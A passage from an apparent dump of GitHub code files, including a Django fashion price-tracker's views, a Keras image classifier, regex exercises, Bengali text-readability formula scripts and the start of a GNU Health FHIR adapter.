send_mail(\n 'Price Monitor - you started monitoring a new product',\n f'Hey! \\nYou\\'re now monitoring prices for {user_product[0].name.title()}.\\nHere is your product\\'s link: http://127.0.0.1:8000/auth={new_prod_user.auth_token}',\n 'fashionpricetracker@gmail.com',\n [user[0].user_email],\n fail_silently=False,)\n\n else:\n # check if value inputed by user as desired_price matches the one currently stored on db.\n # if it doesn't match change value of price_alt to True\n if user_data[\"desired_price\"] != product_to_user.desired_price:\n product_to_user.price_alt = \"True\"\n else:\n product_to_user.price_alt = \"False\"\n\n product_to_user.save()\n\n # redirect to submit repeat URL\n base_url = reverse('duplicate') # 1 duplicate/\n # 2 auth=bhejwbhr374637hfd\n query_string = urlencode(\n {'auth': product_to_user.auth_token, 'new-price': user_data[\"desired_price\"]})\n # 3 /duplicate/?auth=bhejwbhr374637hfd&new-pre=120\n my_url = '{}?{}'.format(base_url, query_string)\n\n return redirect(my_url)\n\n # when page receives a GET request, it renders the class based user/product form and the index hmtl, passing the form as context.\n def get(self, request):\n user_form = UserForm(request.GET)\n return render(request, \"checker/index.html\", {'form': user_form})\n\n def scrape_from_url(self, product_url):\n # headers included to prevent page from block the script when scraping.\n headers = {'user-agent':\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36'}\n\n # get HTML document from URL usign requests lib and passing headers as arg\n r = requests.get(url=product_url, headers=headers)\n\n # parse content through beautifulsoup parser.\n soup = BeautifulSoup(r.content, \"html.parser\")\n\n return soup\n\n def fetch_name_brand(self, product_url, soup):\n # check which brand name is in URL to define brand name:\n if \"ganni\" in product_url:\n brand = \"Ganni\"\n\n elif \"thefrankieshop\" in product_url:\n brand = \"Frankie_Shop\"\n\n elif \"byparra\" in product_url:\n brand = \"ByParra\"\n\n elif \"thereformation\" in product_url:\n brand = \"Reformation\"\n\n # get product's name by finding the first H1 HTML tag in soup objects.\n name = soup.find_all(\"h1\")[0].text\n\n return (name, brand)\n\n def fetch_image(self, brand, soup):\n\n # get image class from dict\n image_arg_one = (brand_specs[brand]['image'])[0]\n image_arg_two = (brand_specs[brand]['image'][1]['class'])\n\n # find elements with the correct class name\n div_tag = soup.select(f\"{image_arg_one}.{image_arg_two}\")\n\n # from the list of divs, get only the img tags.\n images = div_tag[0].find('img')\n\n if brand == 'Reformation':\n # src attribute for Reformation brand is declared as data-src instead of src in HTML.\n img_src = images['data-src']\n else:\n # from the img tag, get only the src attribute.\n img_src = images['src']\n\n # configure source path in proper http:// or https:// format.\n img_src_link = \"http://\"\n\n if img_src.startswith(\"https://\") or img_src.startswith(\"http://\"):\n img_src_link = img_src\n\n elif img_src.startswith(\"//\"):\n after_http = img_src.lstrip(\"//\")\n img_src_link += after_http\n\n else:\n img_src_link += img_src\n\n # configure name of image file to be saved\n file_name = img_src_link.split(\"/\")[-1].split(\".\")[0] + \".jpg\"\n\n # configure path of image file to be saved\n file_path = os.path.join(\n \"checker/static/checker/images/product_images/\", file_name)\n\n # Open the url image, set stream to True, this will return the stream content.\n r = requests.get(img_src_link, stream=True)\n\n # Check if the image was retrieved successfully\n if r.status_code == 200:\n # Set decode_content value to True, otherwise the downloaded image file's size will be zero.\n r.raw.decode_content = True\n\n # Open a local file with wb ( write binary ) permission.\n with open(file_path, 'wb') as file:\n shutil.copyfileobj(r.raw, file)\n\n # full path\n file_path = \"checker/images/product_images/\" + file_name\n\n return (img_src, file_path)\n\n def fetch_price(self, product, soup):\n\n # get brand attribure from product object\n brand = product.brand\n \n # get correct tag and class name\n price_arg_one = (brand_specs[brand]['price'])[0]\n price_arg_two = (brand_specs[brand]['price'][1]['class'])\n\n # find specific tag in parsed content and get the text element out of it.\n price = soup.find_all(price_arg_one, price_arg_two)[0].text\n\n # casting price value as and int and removing any extra characters\n int_price = int(''.join(v for v in price if v.isdigit()))\n\n return int_price\n\n # generate token for user to product relation identification\n def auth_token(self):\n user_token = secrets.token_urlsafe(16)\n return user_token\n\n# Renders submit_success HTML, gets auth token passed through URL and passed that as context to HTML.\n\n\nclass ThanksView(View):\n def get(self, request):\n product_auth = request.GET.get('auth')\n return render(request, \"checker/submit_success.html\", {'product_auth': product_auth})\n\n\nclass RepeatedSubmission(View):\n # get ProducttoUser object that matches the pk passed through URL\n def get_object(self):\n return ProductToUser.objects.get(pk=self.request.GET.get('auth'))\n\n # get product title from Product object attribute\n def get_title(self):\n return self.get_object().linked_product.name.title()\n\n # when page receives a GET request, it renders the submit_duplicate hmtl, passing the the ProductToUser object and the product title as context.\n def get(self, request):\n return render(request, \"checker/submit_duplicate.html\", {'product': self.get_object(), 'title': self.get_title()})\n\n # when POST request is received from form (meaning user submitted a new price),\n # it replaces the object's desired_price attribute value with the new price submitted.\n # also renderes the submit_change_successful.html with the ProducttoUSer object as context.\n def post(self, request):\n object = self.get_object()\n object.desired_price = self.request.GET.get('new-price')\n object.save()\n return render(request, \"checker/submit_change_successful.html\", {'product': object})\n\n# View for product page, it extends Django's generic DetailView as it's ideal to displaying info related to a single object from a Model.\n\n\nclass ProductDetailView(FormMixin, DetailView):\n template_name = \"checker/product_page.html\"\n model = ProductToUser\n form_class = ProductUpdateForm\n\n\n def get_success_url(self):\n return reverse('product-page', kwargs={'pk': self.object.pk})\n\n # adding auth_token, product object, title, price and graph to context to be passed to HTML\n def get_context_data(self, **kwargs):\n context = super(ProductDetailView, self).get_context_data(**kwargs)\n product_id = self.object.linked_product.id\n price_history = PriceHistory.objects.filter(\n linked_product__id=product_id)\n product_auth = self.object.auth_token\n context[\"form\"] = self.get_form()\n context[\"product_auth\"] = product_auth\n context[\"product\"] = self.object.linked_product\n context[\"title\"] = self.object.linked_product.name.title()\n context[\"current_price\"] = self.get_current_price(\n self.get_price_to_date(price_history))\n context[\"script\"], context[\"div\"] = self.generate_graph(\n price_history, context[\"current_price\"], self.object.desired_price)\n return context\n\n # gets last price in DB for specific product and generates a price history graph\n def get_price_to_date(self, price_history):\n price_to_date = OrderedDict()\n\n # loop through all the PriceHistory objects in the price_history list.\n for entry in price_history:\n\n # get object's date attribute\n entry_date = entry.price_date\n\n # get object's price attribute\n entry_price = entry.price\n\n # add date and price to OrderedDict\n price_to_date[entry_date] = entry_price\n\n return price_to_date\n\n def sort_dict_to_lists(self, price_history):\n date_list = []\n price_list = []\n\n # loop through price_to_date key,value pairs to add each date to date_list and price to price_list\n for key, value in price_history.items():\n if key not in date_list:\n date_list.append(key)\n price_list.append(value)\n\n return date_list, price_list\n\n def generate_graph(self, price_history, current_price, desired_price):\n\n price_to_date = self.get_price_to_date(price_history)\n date_list, price_list = self.sort_dict_to_lists(price_to_date)\n print(date_list)\n\n formatted_dates = []\n\n # format datetime objects in list\n for date in date_list:\n formatted_dates.append(pd.to_datetime(date))\n\n # create a new plot with a title and axis labels\n p = figure(title=\"Price History\",\n x_axis_type=\"datetime\", width=500, height=450)\n\n # add multiple renderers - one line and one circle\n if len(date_list) > 1:\n p.line(formatted_dates, price_list, legend_label=\"History\",\n color=\"#0d6efd\", line_width=2)\n else:\n p.circle(formatted_dates[0], price_list[0],\n legend_label=\"History\", color=\"#0d6efd\", size=20)\n\n p.circle(date_list[-1], desired_price,\n legend_label=\"Target Price\", size=20, color=\"#f695d9\")\n\n # set numbers range on y axis (prices)\n p.y_range = Range1d(1, (current_price + 100))\n\n # format y and x axis\n p.yaxis[0].formatter = NumeralTickFormatter(format=\"€0,0\")\n p.xaxis[0].formatter = DatetimeTickFormatter(years=\"%d/%m/%Y\",\n months=\"%d/%m/%Y\",\n days=\"%d/%m/%Y\",\n hours=\"%d/%m/%Y\",\n hourmin=\"%d/%m/%Y\",\n minutes=\"%d/%m/%Y\",\n minsec=\"%d/%m/%Y\",\n seconds=\"%d/%m/%Y\",\n milliseconds=\"%d/%m/%Y\",\n microseconds=\"%d/%m/%Y\")\n\n # get script and div boken components so they can be embedded on html\n script, div = components(p)\n\n return script, div\n\n def get_current_price(self, price_history):\n # reverse received list and get the last element\n last_date, last_price = next(reversed(price_history.items()))\n return last_price\n\n # this func will be used when a post request is received from the update price form\n def post(self, request, *args, **kwargs):\n if not request.user.is_authenticated:\n return HttpResponseForbidden()\n\n # from request get object and form\n self.object = self.get_object()\n form = self.get_form()\n\n # validade form\n if form.is_valid():\n\n # change price in db and generate a new graph with new desired price.\n # pass new script and div components of graph as context to html\n new_desired_price = int(request.POST[\"new_price\"])\n self.object.desired_price = new_desired_price\n self.object.price_email_sent = False\n product_id = self.object.linked_product.id\n self.object.save()\n context = self.get_context_data(**kwargs)\n price_history = PriceHistory.objects.filter(\n linked_product__id=product_id)\n current_price = self.get_current_price(\n self.get_price_to_date(price_history))\n context['script'], context['div'] = self.generate_graph(\n price_history, current_price, new_desired_price)\n return render(request, \"checker/product_page.html\", context)\n\n else:\n return self.form_invalid(form)\n\n def form_valid(self, form):\n # Here, we would record the user's interest using the message\n # passed in form.cleaned_data['message']\n return super(ProductDetailView, self).form_valid(form)\n\n# Renders delete-confirm html, deletes the specific instance of Product to User model (object is identified through pk passed through URL to this view)\n# and redirects to success url\n# Product title is passed as context to delete-confirm html.\n\n\nclass DeleteProductView(DeleteView):\n model = ProductToUser\n template_name = \"checker/delete_confirm.html\"\n success_url = reverse_lazy(\"delete-successful\")\n\n # get context data and pass it to html template\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = self.object.linked_product.name.title()\n return context\n\n# Delete success page only requires a html to be rendered.\n\n\nclass DeleteSuccessful(TemplateView):\n template_name = \"checker/delete_success.html\"\n\n\nclass ContactView(View):\n # when page receives a GET request, it renders the class based contact form and the contact hmtl, passing the form as context.\n def get(self, request):\n contact_form = ContactForm(request.GET)\n return render(request, \"checker/contact.html\", {'form': contact_form})\n\n # when POST request is received from form, it stores its info under specific vars\n # and sends email to admin email with user message details.\n def post(self, request):\n user_data = request.POST\n user_name = user_data['user_name']\n user_email = user_data['user_email']\n message_subject = user_data['subject']\n message_content = user_data['message']\n send_mail(\n 'New user message',\n f'Name:{user_name}\\nEmail:{user_email}\\nSubject:{message_subject}\\nMessage:{message_content}',\n 'fashionpricetracker@gmail.com',\n ['fashionpricetracker@gmail.com'],\n fail_silently=False,)\n return redirect('contact-us/success')\n\n# Contact success page only requires a html to be rendered.\n\n\nclass ContactSuccessView(TemplateView):\n template_name = \"checker/contact_success.html\"\n","repo_name":"ifmachado/PriceMonitor","sub_path":"checker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73491703626","text":"# -*- coding: utf-8 -*\nfrom django.urls import reverse \nfrom django.http import JsonResponse\nfrom django.template import RequestContext\nfrom product.models import ProductList\nfrom utils.tools import response_err\n\n\ndef inventories(view_func):\n\n\t# check inventories fo the follow product\n\tdef _wrapped_view_func(request, *args, **kwargs):\n\t\t# get inventories from request\n\t\ttry:\n\t\t\t#pid = request.product_id\n\t\t\tpid = kwargs.get('pid') if kwargs.get('pid', -1) > -1 else request.POST['product_id']\n\n\t\t\tprod = ProductList.objects.get(product_id=pid)\n\n\t\t\tamount = kwargs.get('stock_pcs') if kwargs.get('stock_pcs', -1) > -1 else request.POST['stock_pcs']\n\n\t\t\tif int(prod.stock_pcs) < int(amount):\n\t\t\t\treturn JsonResponse(response_err(code=1001))\n\n\t\texcept ProductList.DoesNotExist:\n\t\t\treturn JsonResponse(response_err(code=1000))\n\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\treturn JsonResponse(response_err())\n\n\t\treturn view_func(request, *args, **kwargs)\n\n\treturn _wrapped_view_func\n","repo_name":"tingShean/projectb","sub_path":"decorators/inventories.py","file_name":"inventories.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16742591689","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.stats import pearsonr\n\nplt.style.use('seaborn')\n# reads data\ndf = pd.read_csv('../../data/sites/asu_house.csv', converters={'Time':pd.to_datetime})\n\n# I drop the very low concentrations (<0.001) as these are way below MDL\n# and just distorts the figure\ndf=df.dropna(subset=['IndoorConcentration'])[df['IndoorConcentration']>0.001]\n\n# the distinction between the on and testing phases of CPM is not that relevant here\ndf['CPM'].replace(['Testing'],['On'],inplace=True)\n\nfig, ax = plt.subplots(dpi=300)\n\nfor case in df['LandDrain'].unique():\n df_now = df[df['LandDrain']==case]\n r = pearsonr(df_now['IndoorOutdoorPressure'], df_now['logAttenuationAvgGroundwater'])\n\n sns.regplot(\n data=df_now,\n x='IndoorOutdoorPressure',\n y='logAttenuationAvgGroundwater',\n ax=ax,\n x_bins=np.linspace(-15,15,30),\n label=case+', r = %1.2f' % r[0],\n )\n\nax.set(\n title='Land drain\\'s effect on VI pressure dependence at the ASU house\\nPearson\\'s r value for each case shown',\n ylabel='$\\\\log_{10}{(\\\\alpha_\\\\mathrm{gw})}$',\n xlabel='$p_\\\\mathrm{in/out} \\; \\\\mathrm{(Pa)}$',\n)\nax.legend(title='Land Drain')\n\nplt.savefig('../../figures/preferential_pathways/asu_pressure_dependence.pdf')\nplt.show()\n","repo_name":"jstr0em/thesis","sub_path":"code/preferential_pathways/asu_pressure_dependence.py","file_name":"asu_pressure_dependence.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2861457484","text":"import PyPDF2\r\nimport sys\r\n\r\ninputs = sys.argv[1:]\r\n\r\n\r\ndef pdf_combiner(pdf_lists):\r\n merger = PyPDF2.PdfFileMerger()\r\n for pdf in pdf_lists:\r\n merger.append(pdf)\r\n merger.write(\"super.pdf\")\r\n print(\"all done\")\r\n\r\n\r\npdf_combiner(inputs)\r\n","repo_name":"shahzain88/python","sub_path":"PDF_combiner.py","file_name":"PDF_combiner.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"39561156984","text":"from django.template import RequestContext\nfrom django.shortcuts import render_to_response, get_object_or_404\n\nfrom profiles.models import Profile\n\n\ndef home(request):\n ci = RequestContext(request)\n tmpl = {\n 'profiles': Profile.objects.all()\n }\n return render_to_response('profiles/home.html', tmpl, ci)\n\n\ndef profile(request, id, last_name, first_name):\n ci = RequestContext(request)\n tmpl = {\n 'profile': get_object_or_404(Profile, id=id)\n }\n return render_to_response('profiles/profile.html', tmpl, ci)\n","repo_name":"fallenhitokiri/catntent","sub_path":"profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"34714368878","text":"from keras.models import Sequential\r\nfrom keras.layers import Convolution2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dense\r\n\r\n#Initializing the Convulatonal Neural Network\r\nclassifier = Sequential()\r\n\r\n#Step-1 Adding a convolutional layer\r\nclassifier.add(Convolution2D(32, 3, 3, input_shape=(64, 64, 3), activation = 'relu'))\r\n\r\n#Step-2 Pooling\r\nclassifier.add(MaxPooling2D(pool_size=(2, 2), ))\r\n\r\n#Adding another Convolutional layer\r\nclassifier.add(Convolution2D(32, 3, 3, activation = 'relu'))\r\nclassifier.add(MaxPooling2D(pool_size=(2, 2), ))\r\n\r\n#Step-3 Flattening\r\nclassifier.add(Flatten())\r\n\r\n#Step-4 Full connection\r\nclassifier.add(Dense(output_dim = 128, activation='relu'))\r\nclassifier.add(Dense(output_dim = 1, activation='sigmoid'))\r\n\r\n#Step-5 Compiling the CNN\r\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\r\n\r\n#Step-6 Fitting the CNN to the images\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True\r\n)\r\n\r\ntest_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\n#Dataset to train the CNN\r\ntraining_set = train_datagen.flow_from_directory(\r\n 'dataset/training_set',\r\n target_size=(64, 64),\r\n batch_size=32,\r\n class_mode='binary'\r\n)\r\n\r\n\r\n#Dataset to test the CNN\r\ntest_set = test_datagen.flow_from_directory(\r\n 'dataset/test_set',\r\n target_size=(64, 64),\r\n batch_size=32,\r\n class_mode='binary'\r\n)\r\n\r\nclassifier.fit_generator(\r\ntraining_set,\r\nsamples_per_epoch=8000, \r\nnb_epoch=25, \r\nvalidation_data=test_set, \r\nnb_val_samples=2000\r\n)","repo_name":"saanville/CNNDogsAndCatsClassifier","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8630595492","text":"#separate and print the numbers and their position of a given string.\n\n\nimport re\n\ntext = \"The following example creates an ArrayList with a capacity of 50 elements.\\\n Four elements are then added to the ArrayList and the ArrayList is trimmed accordingly.\"\n\n\npattern = \"\\d+\"\n\nfor word in re.finditer(pattern, text):\n print(word.group(0))\n print('Index position : ', word.start())\n\n\n'''\n=> re.finditer(pattern, string, flags=0)\n Return an iterator yielding match objects over all non-overlapping matches for the RE pattern in string. \n \n=> \\d\n For Unicode (str) patterns:\n Matches any Unicode decimal digit (that is, any character in Unicode character category [Nd]). \n This includes [0-9], and also many other digit characters. If the ASCII flag is used only [0-9] is matched.\n \n=> Match.group([group1, ...])\n Returns one or more subgroups of the match. \n If there is a single argument, the result is a single string\n if there are multiple arguments, the result is a tuple with one item per argument.\n \n >>> m = re.match(r\"(\\w+) (\\w+)\", \"Isaac Newton, physicist\")\n >>> m.group(0) # The entire match\n 'Isaac Newton'\n >>> m.group(1) # The first parenthesized subgroup.\n 'Isaac'\n >>> m.group(2) # The second parenthesized subgroup.\n 'Newton'\n >>> m.group(1, 2) # Multiple arguments give us a tuple.\n ('Isaac', 'Newton')\n'''\n","repo_name":"md-mostafa/python_RE_practice","sub_path":"29.py","file_name":"29.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6308711226","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport pandas as pd\nimport joblib\nimport math\n\ndef singleDari(s1):\n s2 = re.sub(r'\\n+', '।',s1)\n s3 = re.sub(r'।+\\s*।*', '।',s2)\n return s3\n\ndef singleSpace(ss):\n return re.sub(r'\\s+\\s*',' ',ss)\n\n\ndef sentenceSplit(str1):\n return re.split(r'।|\\?|!',str1)\n\n\n\ndef replaceMultiple(mainString, toBeReplaces, newString): \n\n\n for elem in toBeReplaces:\n if elem in mainString:\n mainString = mainString.replace(elem, newString)\n\n return mainString\n\n\n\ndef preProcessing(s):\n s1 = replaceMultiple(s, [\"…\",\"\\\\\",'{','}','[',']','॥','#','”','“','.',',',';',':','/','\"','–','-','*','(',')','\\'','%','$', '&', '+', '=','<', '>','|','—','_','\\ufeff','\\u200c','’','‘'] ,' ')\n return s1\n\ndef bengali_sentence_tokenizer(text_path):\n file1 = open(text_path,\"r\")\n text = file1.read()\n l = sentenceSplit(singleSpace(preProcessing(singleDari(text))))\n l1 =[]\n for i in range(len(l)):\n if (l[i].isspace()==False and l[i]!=''): \n l1.append(l[i])\n return l1\n\ndef bengali_sentence_tokenizer1(text):\n l = sentenceSplit(singleSpace(preProcessing(singleDari(text))))\n l1 =[]\n for i in range(len(l)):\n if (l[i].isspace()==False and l[i]!=''): \n l1.append(l[i])\n return l1\n\n\n\n\n\ndef removeExtraWhitespaceFromSents(inp):\n sentence_token =[]\n for i in range(len(inp)):\n k =[]\n removed_index =[]\n k = inp[i].split(\" \")\n sentence_token.append(list(filter(str.strip, k)))\n sentence_token_merged =[]\n for i in range(len(sentence_token)):\n sentence_token_merged.append(' '.join(sentence_token[i]))\n return sentence_token_merged\n\npronunciation_dict = pd.read_csv(\"/content/drive/My Drive/Readability_dataset/lexicon.tsv\",sep='\\t',header=None)\n\npronunciation_dict_words=list(pronunciation_dict[0])\n\npronunciation_dict_length_temp = list(pronunciation_dict[1])\n\npronunciation_dict_words_length = []\n\n\n\nfor i in range(len(pronunciation_dict_length_temp)):\n str1 = pronunciation_dict_length_temp[i]\n if '.' not in str1:\n pronunciation_dict_words_length.append(1)\n else:\n pronunciation_dict_words_length.append(len(str1.split('.')))\n\ng1 = '/content/drive/My Drive/Readability_dataset/pronunciation_dict_words.pkl'\njoblib.dump(pronunciation_dict_words,g1)\n\ng2 ='/content/drive/My Drive/Readability_dataset/pronunciation_dict_words_length.pkl'\njoblib.dump(pronunciation_dict_words_length,g2)\n\ns1= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class1_1.txt')\n\n\ns5= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class2_1.txt')\n\n\ns9= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class3_1.txt')\n\ns13= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class4_1.txt')\n\n\ns17= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class5_1.txt')\n\n\ns21= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class6_1.txt')\n\n\ns25= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class7_1.txt')\n\n\ns29= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class8_1.txt')\n\n\n\ns33= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class9+10_1.txt')\n\n\ns37= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class11+12_1.txt')\n\n\n\ns41= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/shishutosh1.txt')\ns42= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/shishutosh2.txt')\n\n\n\ns46= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/prapto1.txt')\ns47= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/prapto2.txt')\n\nall_sents =s1+s5+s9+s13+s17+s21+s25+s29+s33+s37+s41+s42+s46+s47\n\nall_sents1 = removeExtraWhitespaceFromSents(all_sents)\n\nwords =[]\n\n\nfor i in range(len(all_sents1)):\n s = all_sents1[i].split()\n for i1 in range(len(s)):\n words.append(s[i1])\n\nunique_words = list(set(words))\n\nvocab_not_in_dict =[]\n\nfor i in range(len(unique_words)):\n if unique_words[i] not in pronunciation_dict_words:\n #count2 = count2 + 1\n vocab_not_in_dict.append( unique_words[i])\n\nf=open(\"/content/drive/My Drive/Readability_dataset/vocab_not_in_dict.txt\",\"w+\")\n\nfor i in range(len(vocab_not_in_dict)):\n f.write(vocab_not_in_dict[i]+\",\"+\"\\n\")\n\noov1 = pd.read_csv(\"/content/drive/My Drive/Readability_dataset/vocab_not_in_dict.csv\",header=None)\n\nall_words =pronunciation_dict_words + list(oov1[0])\n\nall_words_syllable_count = pronunciation_dict_words_length + list(oov1[1])\n\n\"\"\"**Flesch–Kincaid readability tests**\n[https://en.wikipedia.org/wiki/Flesch%E2%80%93Kincaid_readability_tests](https://en.wikipedia.org/wiki/Flesch%E2%80%93Kincaid_readability_tests)\n\"\"\"\n\ndef flesch_kincaid(text_path):\n file1 = open(text_path,\"r\")\n text = file1.read()\n if len(text.strip()) != 0: \n s1= bengali_sentence_tokenizer1(text) \n sentence_token =[]\n for i in range(len(s1)):\n k =[]\n k = s1[i].split(\" \")\n sentence_token.append(list(filter(str.strip, k)))\n\n input_length_list = []\n for i in range(len(sentence_token)):\n input_length_list.append(len(sentence_token[i]))\n \n total_words =sum(input_length_list)\n total_sentences = len(s1)\n \n my_words =[]\n syllable_count =[]\n \n for i in range(len(sentence_token)):\n for i1 in range(len(sentence_token[i])):\n my_words.append(sentence_token[i][i1]) \n \n\n for i in range(len(my_words)):\n if my_words[i] == \"দিল\" or my_words[i] == \"পাইল\":\n syllable_count.append(2)\n \n else: \n for i1 in range(len(all_words)):\n \n if my_words[i] == all_words[i1]:\n syllable_count.append(all_words_syllable_count[i1])\n break\n print(\"sents:\", total_sentences) \n print(\"words:\",total_words) \n print(len(my_words),\" \", len(syllable_count))\n \n total_syllables = sum(syllable_count)\n print(total_syllables)\n words_per_sent= total_words/total_sentences\n syllables_per_word = total_syllables/total_words\n \n flesch_score = 206.835 - (1.015 * words_per_sent) -(84.6 * syllables_per_word)\n print(\"flesch_score: \", round(flesch_score,2))\n \n kincaid = (0.39 * words_per_sent) + (11.8 * syllables_per_word) - 15.59\n print(\"Flesch–Kincaid grade level: \",round(kincaid,2))\n\n\"\"\"**Gunning fog Index**\n\n\n[https://www.webfx.com/tools/read-able/gunning-fog.html](https://www.webfx.com/tools/read-able/gunning-fog.html)\n\"\"\"\n\n#!pip install bnlp_toolkit\n\n#!pip install fasttext\n\nimport nltk\nnltk.download(\"punkt\")\n\nfrom bnlp.bengali_pos import BN_CRF_POS\nbn_pos = BN_CRF_POS()\nmodel_path = \"/content/drive/My Drive/Readability_dataset/bn_pos_model.pkl\"\n\ndef gunning_fog(text_path):\n file1 = open(text_path,\"r\")\n text = file1.read()\n if len(text.strip()) != 0: \n s1= bengali_sentence_tokenizer1(text) \n sentence_token =[]\n for i in range(len(s1)):\n k =[]\n k = s1[i].split(\" \")\n sentence_token.append(list(filter(str.strip, k)))\n\n input_length_list = []\n for i in range(len(sentence_token)):\n input_length_list.append(len(sentence_token[i]))\n \n total_words =sum(input_length_list)\n total_sentences = len(s1)\n \n my_words =[]\n syllable_count =[]\n \n for i in range(len(sentence_token)):\n for i1 in range(len(sentence_token[i])):\n my_words.append(sentence_token[i][i1]) \n \n\n for i in range(len(my_words)):\n if my_words[i] == \"দিল\" or my_words[i] == \"পাইল\":\n syllable_count.append(2)\n \n else: \n for i1 in range(len(all_words)):\n \n if my_words[i] == all_words[i1]:\n syllable_count.append(all_words_syllable_count[i1])\n break\n \n complex_words = 0\n for i in range(len(s1)):\n #print(s1[i]) \n res = bn_pos.pos_tag(model_path, s1[i])\n for i1 in range(len(res)):\n if res[i1][1]!='NP' and all_words_syllable_count[all_words.index(res[i1][0])] >=3:\n complex_words = complex_words + 1\n #print( res[i1][1],\" \", res[i1][0], \" \", complex_words)\n \n \n words_per_sent= total_words/total_sentences\n complexWords_per_word = complex_words/total_words\n \n g = 0.4 * (words_per_sent + 100 * complexWords_per_word)\n \n print(\"Gunning fog index: \",round(g))\n\n\"\"\"SMOG\"\"\"\n\ndef smog(text_path):\n file1 = open(text_path,\"r\")\n text = file1.read()\n if len(text.strip()) != 0: \n s1= bengali_sentence_tokenizer1(text) \n sentence_token =[]\n for i in range(len(s1)):\n k =[]\n k = s1[i].split(\" \")\n sentence_token.append(list(filter(str.strip, k)))\n\n input_length_list = []\n for i in range(len(sentence_token)):\n input_length_list.append(len(sentence_token[i]))\n \n total_words =sum(input_length_list)\n total_sentences = len(s1)\n \n my_words =[]\n syllable_count =[]\n \n for i in range(len(sentence_token)):\n for i1 in range(len(sentence_token[i])):\n my_words.append(sentence_token[i][i1]) \n \n\n for i in range(len(my_words)):\n if my_words[i] == \"দিল\" or my_words[i] == \"পাইল\":\n syllable_count.append(2)\n \n else: \n for i1 in range(len(all_words)):\n \n if my_words[i] == all_words[i1]:\n syllable_count.append(all_words_syllable_count[i1])\n break\n \n number_of_polySyllables =0\n \n for i in range(len(syllable_count)):\n if syllable_count[i] >=3:\n number_of_polySyllables = number_of_polySyllables + 1\n \n\n s = 1.0430 * math.sqrt((30 * number_of_polySyllables) / total_sentences) + 3.1291\n print(\"SMOG score: \",round(s,2))","repo_name":"tafseer-nayeem/BengaliReadability","sub_path":"Code/Formula based/flesch_gunning_smog.py","file_name":"flesch_gunning_smog.py","file_ext":"py","file_size_in_byte":10026,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"81"} +{"seq_id":"74788065544","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\nif __name__ == '__main__':\n result = []\n # str_pattern = r\"^([a-z]{1,20}) ([a-z]{1,50}@gmail\\.com)$\"\n pattern_name = r\"^[a-z]{1,20}\"\n pattern_gmail = r\"[a-z]+@gmail\\.com{1,50}\"\n\n N = int(input())\n\n for N_itr in range(N):\n firstNameEmailID = input().split()\n\n firstName = firstNameEmailID[0]\n emailID = firstNameEmailID[1]\n\n name_match = re.search(pattern_name, firstName)\n email_match = re.search(pattern_gmail, emailID)\n \n if email_match:\n result.append(name_match.group())\n\n print(\"\\n\".join(sorted(result)))","repo_name":"diazinmotion/CodeChallenges","sub_path":"30 Days Code/28 - RegEx, Patterns, and Intro to Databases.py","file_name":"28 - RegEx, Patterns, and Intro to Databases.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41442892687","text":"from gnu_health_fhir.common.utils import safe_attrgetter\nfrom pendulum import instance\nfrom fhirclient.models.clinicalimpression import ClinicalImpression as fhir_impression\nfrom .base import BaseAdapter\nfrom .patient_adapter import Patient\nfrom .encounter_adapter import Encounter\nfrom .practitioner_adapter import Practitioner\n\n\n__all__ = [\"ClinicalImpression\"]\n\n\nclass ClinicalImpression(BaseAdapter):\n \"\"\"Immature resource somewhat equivalent to SOAP notes, H&P, etc\n\n Eventually, should support 3 models:\n - evaluations (most important)\n - roundings\n - 